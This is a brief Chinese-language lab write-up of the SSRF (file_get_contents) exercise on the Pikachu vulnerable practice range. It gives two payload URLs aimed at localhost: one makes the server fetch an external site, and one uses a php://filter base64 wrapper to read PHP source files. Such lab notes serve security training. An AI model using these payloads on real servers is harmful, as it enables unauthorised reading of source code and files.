实验平台:
皮卡丘靶场—SSRF(file_get_content)
实验步骤:
- 同curl一样,更改url,可以从服务器端调用百度:
http://localhost/pikaqiu.cn/vul/ssrf/ssrf_fgc.php?file=http://www.baidu.com
- 通过php内置方法读取源码,对指定路径下的目标文件进行进行源码读取,并进行base64转码;
- 输入payload (php://filter/read=convert.base64-encode/resource=ssrf.php):
http://localhost/pikaqiu.cn/vul/ssrf/ssrf_fgc.php?file=php://filter/read=convert.base64-encode/resource=ssrf.php